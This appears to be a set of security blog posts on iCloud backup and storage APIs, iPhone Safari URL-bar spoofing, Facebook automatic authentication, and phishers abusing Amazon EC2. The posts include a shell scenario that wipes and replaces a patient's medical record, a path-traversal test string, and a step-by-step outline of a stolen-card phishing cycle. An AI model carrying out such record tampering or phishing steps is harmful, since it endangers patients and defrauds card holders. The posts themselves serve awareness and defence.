Apple's iCloud service comprises two distinct features. The first provides the user with the ability to back up and restore the device over the air without having to sync with an OSX or Windows computer. This mechanism is completely controlled by Apple and also provides free email and photo syncing capabilities. The second feature of iCloud allows 3rd party developers to leverage data storage capabilities within their own apps.
In this article, I will provide my initial thoughts on iCloud from a security perspective. The emphasis of this article is to discuss the iCloud storage APIs from a secure coding and implementation angle, but I will start by addressing some thoughts on the backup and restore components.
Business Implications of Device Backup and Restore Functionality
Starting with iOS5, iPhone and iPad users do not have to sync their devices with a computer. Using a wireless connection, they can activate their devices as well as back up and restore their data by setting up an iCloud account.
Following are some thoughts on risks and opportunities that may arise for businesses as their employees begin to use iOS devices that are iCloud enabled.
High potential for mass data compromise using automated tools.
An iOS device that is iCloud enabled continuously syncs data to Apple’s data-centers (and to cloud services Apple has in turn leased from Amazon (EC2) and Microsoft (Azure)). The device also performs a backup about once a day when the device is plugged into a power outlet and when WiFi is available (this can also be manually initiated by the user).
It is easy to intercept the traffic between an iOS device and the iCloud infrastructure using an HTTP proxy tool such as Burp. Interestingly, the backupd process also backs up data to the Amazon infrastructure:
PUT /[snip]?x-client-request-id=[snip]&Expires=1322186125&AWSAccessKeyId=[snip]&Signature= [snip] HTTP/1.1
In this case, the device had previously authenticated to Apple domains (*.icloud.com and *.apple.com). Most likely, those servers initiated a back-end session with Amazon tied to the user’s session based on the filename provided to the PUT request above.
The biggest point here from a security perspective is that all of this information is protected by the user's iCloud credentials, which are present in the Authorization: X-MobileMe-AuthToken header using basic access authentication (base64).
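Basic access authentication offers no secrecy of its own: the header value is just base64, so anyone who captures it recovers the credentials directly. A two-line Python illustration (the captured value below is a made-up example, not a real token):
import base64

# Hypothetical captured header value (base64 of "user@example.com:auth-token").
captured = "dXNlckBleGFtcGxlLmNvbTphdXRoLXRva2Vu"

print(base64.b64decode(captured).decode())  # -> user@example.com:auth-token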
iCloud backs up emails, calendars, SMS and iMessages, browser history, notes, application data, phone logs, etc. This information can be a gold mine for adversaries. It is my hypothesis that in the near future we are going to see automated tools that do the following:
Attempt the credentials of each compromised account (whose username is an email address, as required by iCloud) against iCloud.
For every successful credential, download the restore files thereby completely compromising the user’s information.
The risk to organizations and government institutions is enormous. A malicious entity can automatically download the majority of the data associated with an individual's iPhone or iPad simply by gaining access to their iCloud password (which could have been compromised due to password reuse at another service).
Information security teams must integrate baselines and policies relating to iCloud.
Also, Mobile Device Management (MDM) vendors are likely to integrate iCloud related policy settings and this should be leveraged.
3rd party apps, as well as iOS apps developed in-house, should be assessed for security vulnerabilities and against the iCloud API related principles listed in the next section.
iCloud Storage APIs
A significant aspect of the iCloud platform is the availability of the iCloud storage APIs [http://developer.apple.com/icloud/index.php] to developers. These APIs allow developers to write applications that leverage the iCloud to wirelessly push and synchronize data across user devices.
iCloud requires iOS5 and Mac OSX Lion. These operating systems have been recently released and developers are busy modifying their applications to integrate the iCloud APIs. In the coming months, we are bound to see an impressive increase in the number of apps that leverage iCloud.
In this section, I will discuss my initial thoughts on how to securely enable iOS apps using the iCloud Storage APIs. I will step through how to write a simple iOS app that leverages iCloud Storage APIs. This app will create a simple document in the user’s iCloud container and auto update the document when it changes. During this walk-through, I will point out secure development tips and potential abuse cases to watch out for.
Creating and Configuring an App ID and Provisioning Profile for iCloud Services
This is the first step required to allow your test app to be able to use the iCloud services. The App ID is really a common name description of the app to use during the development process.
Figure 1: Creating an App ID using the Developer provisioning portal.
The provisioning portal also requires you to pick a “Bundle Identifier” in reverse-domain style. This has to be a unique string. For example, an attempt to create an App ID with the Bundle Identifier of com.facebook.facebook is promptly rejected because it is most likely in use by the official Facebook app.
The next step is to enable your App ID for iCloud services. Click on “Configure” in your App ID list under the “Action” column. Next, check “Enable for iCloud”
Figure 2: Enabling your App ID for iCloud
Select the “Provisioning” tab and click on “New Profile”. Pick the App ID you created earlier and select the devices you want to test the app on. Note that the simulator cannot access the iCloud API so you will need to deploy the app onto an actual device.
Once you have the App ID configured, you have to create a provisioning profile. A provisioning profile is a property-list (.plist) file signed by Apple. This file contains your developer certificate. Code that is signed with this developer certificate is allowed to execute on the devices selected in the profile.
Figure 3: Provisioning profile loaded in XCode
Download the profile and open it (double-click and XCode should pick it up as shown in Figure 3).
Writing a Simple iCloud App in XCode
In Xcode, create a new project. Choose “Single View Application” as the template. Enter “dox” for the product name and the company identifier you used when creating the App ID. The Device family should be “Universal”. The “Use Automatic Reference Counting” option should be checked and the other options should be unchecked.
Figure 4: Creating a sample iCloud project in XCode
Next, select your project in the “Project Navigator” and select the “dox” target. Click on “Summary” and go to the “Entitlements” section.
Figure 5: Project entitlements (iCloud)
The defaults should look like the screen-shot in Figure 5 and you don’t have to change anything.
Open up AppDelegate.m and add the following code at the bottom of application:didFinishLaunchingWithOptions (before the return YES;):
NSURL *ubiq = [[NSFileManager defaultManager]
               URLForUbiquityContainerIdentifier:nil];
if (ubiq) {
    NSLog(@"iCloud access at %@", ubiq);
    // TODO: Load document...
} else {
    NSLog(@"No iCloud access");
}
Figure 6: “Documents & Data” in iCloud settings turned off
Now assume that the test device has the “Documents & Data” preference in iCloud set to “off”. In this case, if you run the project now, you should see the log notice shown in Figure 7.
Figure 7: App unable to get an iCloud container instance
If the “Documents & Data” settings were turned “On”, you should see the log notice similar to Figure 8.
Figure 8: iCloud directory on the local device
Notice that the URL returned is a 'local' (i.e. file://) container. This is because the iCloud daemon running on the iOS device (and on OSX) automatically synchronizes the information users put into this directory across all of the user's iCloud devices. If the user also has OSX Lion, the iCloud files created on iOS will appear in the ~/Library/Mobile Documents/ directory on the Mac.
Once you are done, you can deploy your app onto two separate iOS devices and watch the text sync using iCloud. The embedded video above demonstrates the app in action.
Security Considerations
The following are a list of security considerations that may be useful in managing risk pertaining to the iCloud storage APIs.
Guard the credentials to your Apple developer accounts. It is important for you to safeguard your Apple developer account credentials and make sure the credentials are complex enough to prevent potential brute forcing. Someone with access to your developer account could release an app with the same Bundle Seed ID (discussed below) that accesses the users’ iCloud containers and ferries the information to the attacker.
The Bundle Seed ID is used to constrain the local iCloud directory. As you can see in Figure 8, the local directory is in the form [Bundle Seed/Team ID].[iCloud Container specified in entitlements]. The app can have multiple containers (i.e. multiple directories) if specified in the entitlements, but only in the form [Bundle Seed ID].*, as constrained in the provisioning profile.
If you try to change the values of com.apple.developer.ubiquity-container-identifiers or com.apple.developer.ubiquity-kvstore-identifier (in your entitlements settings visible in Xcode) to begin with anything other than what you have in your provisioning profile, XCode will complain as shown in Figure 10.
Figure 10: Xcode error about invalid entitlements
It is clear that Apple uses the Bundle Seed ID (Team ID) to constrain access to user data in iCloud between different organizations. As discussed earlier, if someone were to get Apple's provisioning portal to issue a provisioning profile with someone else's Team ID, they could write apps that (at least locally) have access to the user's iCloud data, since the local iCloud file:// mapping will coincide.
Do not store critical information in iCloud containers, including session data. iCloud data is stored locally and synced to the iCloud infrastructure. Users often have multiple devices (iPhone, iPod Touch, iPad, Macbook, iMac), so their iCloud data will be automatically synced across devices. If a malicious entity were to temporarily gain access to the file-system (by having physical access or by implanting malware), he or she could gain access to the local iCloud containers (/private/var/mobile/Library/Mobile Documents/ in iOS and ~/Library/Mobile Documents/ in OSX). It is therefore a good idea not to store critical information such as session tokens, passwords, financial data, or personally identifiable healthcare data.
Do not trust data in your iCloud to commit critical transactions. As discussed in the prior paragraph, an attacker with temporary access to a user’s file system can access iCloud documents stored locally. Note that the attacker can also edit or add files into the iCloud containers and the changes will be synced across devices.
Figure 11: Sample medical app that leverages iCloud to store patient data
Assume a hospital were to deploy an iCloud enabled medical app to be used by doctors, such as the one shown in the screenshot in Figure 11. If an attacker were to gain access to the doctor's Macbook Air running OSX, for example, they could look at the local filesystem:
$ cd ~/Library/Mobile\ Documents/46Q6HN4L88~com~hospital~app/Documents
$ ls
Allergies.txt 1.TIFF
$ cat /dev/null > Allergies.txt
$ cp ~/Downloads/1.TIFF 1.TIFF
Once the attacker has issued the commands above, the doctor’s iCloud container will be updated with the modified information across all devices. In this example, the attacker has altered a particular patient’s record to remove listed allergies and replace the X-Ray image.
Figure 12: Updated medical record after intruder gains temporary access to Doctor’s Macbook Air
The doctor will see the updated record when the medical app is accessed after the attacker makes these changes on the doctor’s Macbook Air (Figure 12).
Store files in the Documents directory. Users can delete individual files in their iCloud accounts if they are stored in the ‘Documents’ directory:
Other files will be treated as data and can only be deleted all at once. Storing files in the Documents directory also allows users to notice and notify you if a bug in your application is writing too much data into iCloud, which can exhaust users' storage quotas and thus create a denial of service condition.
Take care to handle conflicts appropriately. Documents that are edited on multiple devices are likely to cause conflicts. Depending upon the logic of your application code, it is important to make sure you handle these conflicts so that the integrity of the user’s data is preserved.
Understand that Apple has the capability to see your users' iCloud data. Data going from the local device to the iCloud infrastructure is encrypted in transit. However, note that Apple has the capability to look at your users' data. There is a low probability that Apple would choose to do this, but depending upon your business, there may be regulatory and legal issues that prohibit storage of certain data in iCloud.
iOS sandboxing vulnerabilities may be exploited by rogue apps. Try putting the string @"..\..\Documents" into URLByAppendingPathComponent, or editing your container identifier in your entitlements to contain ".." or other special characters. You will note that iOS will either trap your attempt at runtime or replace the special characters that could cause an app to break out of its local iCloud directory. If someone were to find a vulnerability in iOS sandboxing or file parsing mechanisms, it is possible they could leverage it to build a rogue app that is able to access another app's iCloud data.
These security principles also apply to key-value data storage. The iCloud Storage APIs also allow the storage of key-value data in addition to documents. The security tips outlined in this article also apply to key-value storage APIs.
Watch out for iCloud backups. As presented in the earlier section, the user can choose to back up his or her phone data to iCloud. This includes the Documents/ portion within the app sandbox (note: this is not the Documents folder created as part of the iCloud container, but the one present as part of the application bundle). If there is critical information you do not wish to preserve, move it to Library/Caches. You may also wish to leverage the addSkipBackupAttributeToItemAtURL method to identify specific directories that should not be backed up.
I hope this article contained information to help you and your organization think through security issues and principles surrounding iCloud. The ultimate goal is to enable technology, but in a way that is cognizant of the associated risks. Feel free to get in touch if you have any comments, questions, or suggestions.
Popular web browsers today do not allow arbitrary websites to modify the text displayed in the address bar or to hide the address bar (some browsers may allow popups to hide the address bar, but in such cases the URL is then displayed in the title of the window). The reasoning behind this behavior is quite simple: if browsers can be influenced by arbitrary web applications to hide the URL or to modify how it is displayed, then malicious web applications can spoof user interface elements to display arbitrary URLs, tricking the user into thinking he or she is browsing a trusted site.
I’d like to call your attention to the behavior of Safari on the iPhone via a proof of concept demo. If you have an iPhone, browse to the following demo and keep an eye out on the address bar:
For those who do not have an iPhone available, here is a video:
And here are two images detailing the issue.
Figure: Image on left illustrates the page rendered which displays the ‘fake’ URL bar while the real URL bar is hidden above. Image on right illustrates the real URL bar that is visible once the user scrolls up.
Notice that the address bar stays visible while the page renders, but immediately disappears as soon as it is rendered. Perhaps this may give the user some time to notice but it is not a reasonably reliable control (and I don’t think Apple intended it to be).
I did contact Apple about this issue and they let me know they are aware of the implications but do not know when and how they will address the issue.
I have two main thoughts on this behavior, outlined below:
1. Precious screen real estate on mobile devices. This is most likely the primary reason why the address bar disappears upon page load on the iPhone. Note that on the iPhone, this only happens for websites that follow directives in HTML to advertise themselves as mobile sites (see the source of the index.html in the demo site above for example).
Since the address bar in Safari occupies considerable real estate, perhaps Apple may consider displaying or scrolling the current domain name right below the universal status bar (i.e. below the carrier and time stamp). Positioning the current domain context in a location that cannot be altered by the rendered web content would give users an indication similar to the one browsers such as IE and Chrome provide by highlighting the current domain being rendered.
2. The consequences of full screen apps in iOS using UIWebView. Desktop operating systems most often launch the default web browser of choice when a http or https handler is invoked (this is most often the case even though the operating systems provide interface elements that can be used to render web content within the applications).
However, in the case of iOS, since most applications are full-screen, it is in the interest of the application designers to keep the users immersed within their application instead of yanking the user out into Safari to render web content. Given this situation, it becomes vital for iOS to provide consistency so the user can be ultimately assured what domain the web content is being rendered from.
To render web content within applications, all developers have to do is invoke the UIWebView class. It is as simple as invoking a line of code such as [webView loadRequest:requestObj]; where requestObj contains the URL to render.
Figure: Twitter App rendering web content on the iPad.
The screenshot above illustrates web content rendered by the fantastic Twitter app on the iPad. To create this screenshot, I launched the Twitter app on the iPad, selected a tweet from @appleinsider, and clicked on the URL http://dlvr.it/9D81j in the tweet. Notice that the URL of the actual page being rendered is nowhere to be seen.
In such cases, it is clear that developers of iOS applications need to make sure they clearly display the ultimate domain from which they are rendering web content. A welcome addition would be default behavior on the part of UIWebView to display the current domain context in a designated and consistent location.
Given how rampant phishing and malware attempts are these days, I hope Apple chooses not to allow arbitrary web applications to scroll the real Safari address bar out of view. In the case of applications that utilize UIWebView, I recommend a designated screen location, accessible only by iOS, that displays the domain from which the web content is being rendered when serving requests via calls to UIWebView. That said, I do realize how precious real estate is on mobile devices, and if Apple chooses to come up with a better way of addressing this issue, I'd welcome that as well.
Facebook users have been repeatedly warned that 3rd party Facebook applications can consume their private information. As such, many users have come to expect a fair warning (illustrated in the figure below) that includes an explicit authorization request from the Facebook platform when a 3rd party Facebook application is accessed.
Image: Facebook platform requesting authorization from user prior to enabling 3rd party application
Contrast that expectation with the following description of 'Automatic Authentication' from Facebook's developer wiki:
“Automatic authentication means that if a user visits an application canvas page (whether it's an FBML- or iframe-based canvas page), Facebook will pass that visitor's user ID to the application, even if the user has not authorized the application. The UID also gets passed when a user interacts with another user's application tab.
With this ID, the application can access the following data for most users (except for users who have chosen to not display a public search listing):
name
friends
Pages fanned
profile picture
gender
current location
networks (regional affiliations only)
list of friends”
The ‘Automatic Authentication’ feature is not new - it has been in place since July 2008. I’m bringing it to attention today for the following reasons:
Even the more privacy-savvy individuals are unaware of this ‘feature’. Users who have made the effort to learn about Facebook’s privacy settings are unlikely to be aware of this capability, and many of them click on URLs within Facebook freely because they rely on the Facebook platform to ask for explicit authorization when a 3rd party application page is accessed.
The implications of publicly available data and the potential ability of a rogue 3rd party to uncloak a specific user’s identity are distinct issues.
In their explanation on the developer wiki, Facebook explicitly states that 3rd party applications that use this feature can only gather information about the given user that may be publicly searchable anyway.
However, this assurance from Facebook is without merit because the implied reasoning rests on a flawed assumption: the act of users choosing to make some of their information publicly searchable does not in any way grant rogue 3rd party applications the ability to uncloak their identity (and data). Here is a simple example: my name is Nitesh Dhanjani and the information on my blog is public - however, my web browser vendor cannot use this as a reasonable excuse to uncloak my identity to 3rd party web applications I visit.
The widening delta between the granularity of controls provided by social media platforms and the controls demanded by privacy advocates may lead to the need for client-side controls.
Image: The fb_fromhash parameter
For example, users who land on Facebook applications will notice a parameter called fb_fromhash, which is present regardless of what authorization mechanism the 3rd party Facebook application chooses to use. This could be leveraged to create a browser-side control (for example, a Firefox plug-in) that warns the user that he or she may be accessing a 3rd party application with the ability to automatically capture his or her identity. In other words, I foresee the need for a client-side model to bridge the gap between the privacy controls provided by vendors of social platforms and the needs of individual users. Social-privacy-client-IDS, if you want to call it that.
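As a rough illustration of the idea (and only an illustration: a real control would more naturally live inside the browser, for example as a Firefox plug-in written in JavaScript), the check itself amounts to inspecting each URL for the parameter before the page loads. The helper below is hypothetical, written in the same Objective-C used elsewhere in this write-up; the parameter name is the one described above.

    #import <Foundation/Foundation.h>

    // Hypothetical helper (name and approach are mine): returns YES if a URL
    // carries the fb_fromhash parameter, in which case a client-side control
    // could warn the user that the destination may be able to capture their
    // identity automatically.
    static BOOL URLMayAutoAuthenticate(NSURL *url) {
        NSString *query = [url query];
        if (query == nil) {
            return NO;
        }
        for (NSString *pair in [query componentsSeparatedByString:@"&"]) {
            NSString *name = [[pair componentsSeparatedByString:@"="] objectAtIndex:0];
            if ([name isEqualToString:@"fb_fromhash"]) {
                return YES;
            }
        }
        return NO;
    }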
Indeed, there is a clear rule of thumb pertaining to the use of online social applications: don’t put anything online that you wouldn’t want to persist in the public domain. However, this does not mean that the brands in the business of providing us social platforms get to go scot-free. I sincerely hope this post has given you some additional information on how ‘automatic authentication’ works, and on its implications, in case you were not aware of it before.
As a technology enthusiast first, and an information security professional second, I admire the internal complexity, external simplicity, and sheer power offered by Amazon's cloud computing services. Academics have long fantasized about instant-on, pay-per-use grid computing; Amazon has turned this into reality. The advent of utility computing indicates progress: it is 2009 - most of us shouldn't have to dwell on organizing computing infrastructure - rather, most of us should be able to take computing for granted so we can create great things with it.
I'd like to discuss how the EC2 service, as it stands today, can be and is being abused by criminals. I'm not the first person to bring up this problem, yet it is an important issue worthy of further discussion because it places an extraordinarily powerful infrastructure in the hands of cyber-criminals.
For the purpose of this conversation, I want to focus on how the criminals in the phishing underground are likely to benefit from Amazon's EC2, because it ties back to what I feel is the root issue (the credit card system). I'd also like to invite you to read an interview with Billy Rios and me, titled Spies in the Phishing Underground, to gain further background on the characteristics of the average phisher, the common tools used, and how these criminals communicate and trade knowledge.
In order to set up a phishing site, the first task a criminal has to complete is to compromise and gain access to a server on the Internet (or obtain one by way of bartering). The next thing the phisher is likely to do is un-archive a ready-made phishing kit (HTML, JavaScript, and images representing the target organization's logo, plus a server-side script that collects the POST variables and emails them to a static email address owned by the phisher) into the web-root of the web server running on the compromised host. And there you have it: a fully working phishing site.
A typical phishing site is discovered by the targeted organization via customer complaints or with the aid of community-driven anti-phishing efforts (example: Phishtank). Once this happens, the ISP that owns the IP address of the compromised host is identified and contacted. All of this happens within a matter of hours. In other words, the time-to-live of a phishing site is less than a day, often only a few hours. This promotes a whack-a-mole approach to the problem: criminals set up phishing sites as fast as they can, while the organizations being targeted must locate them and attempt to shut them down by contacting the ISPs.
The goal of the targeted institutions is to play the whack-a-mole game faster: find the phishing sites as quickly as possible and shut them down before their customers' data is stolen.
On the other hand, the goal of the phisher is to play the whack-a-mole game harder: quickly spawn new instances of phishing websites and lure potential victims into submitting their information. Because the time-to-live of a phishing site is only a matter of hours, it is in the best interest of the criminals to continue to seek out faster methods of spawning new instances of phishing sites. This is why Amazon EC2 is a ripe platform for phishers. If you are a phisher, this is the process you can follow to abuse the EC2 platform:
Sign up for an Amazon account and EC2 service using a single stolen credit card.
Configure an EC2 virtual instance (AMI) to host a phishing site.
Spawn n instances of the AMI. The phishing sites are now active (if the default number of instances a new customer is allowed to create is low, the phisher will have to create m Amazon accounts in step 1 to get n x m instances, if that is the goal).
Collect thousands of additional credit card numbers in a matter of hours.
Amazon is likely to be notified of the phishing sites and will terminate the account and all associated AMIs. No problem. Just select one credit card out of the hundreds or thousands likely to have been captured in step 4 and go back to step 1.
Do you see the problem at hand? EC2 is an extraordinarily powerful infrastructure available to anyone with a stolen credit card. Even if someone is able to use the EC2 platform for a few hours with a stolen credit card, he or she will be able to initiate a vicious cycle that may become impossible to halt.
I feel that the root cause of this situation is that credit institutions, weighing lost revenue against the amount of fraud committed, have decided to accept the fraud because the cost of instituting a more secure mechanism (biometric or 2-factor, for example) is higher than the cost of the fraud. Profitable institutions have the right to make a business decision such as this, but the problem in this scenario is that the cost of the fraud stemming from credit card transactions, which are insecure by design (the credit-card system is based on a static number that never changes), is also borne by merchants such as Amazon and by the organizations that run their businesses on the Amazon cloud, yet this cost is not figured into the original business decision.
I think this is a disappointing situation. From a business perspective, I sympathize with Amazon - here is a company that wants to offer bleeding-edge innovation to the masses, yet it is unable to find an alternative to the credit-card system without compromising and making the service harder for legitimate customers to use. Even so, I am glad that Amazon continues to offer its platform to the masses. Innovation should be allowed to drive forward. Always.
It isn't within the scope of this write-up to consider the technical tactics Amazon could use to lower the impact and probability of the problem (but feel free to comment if you want to discuss them). However, I do wish Amazon did a better job of setting up a clear channel of communication so that information security researchers and administrators could easily reach them. I have been asked for advice by organizations that have observed denial of service attacks, originating from the Amazon cloud space, launched their way, and I'm told it often seems next to impossible to reach anyone at Amazon who knows or cares enough to look into the matter.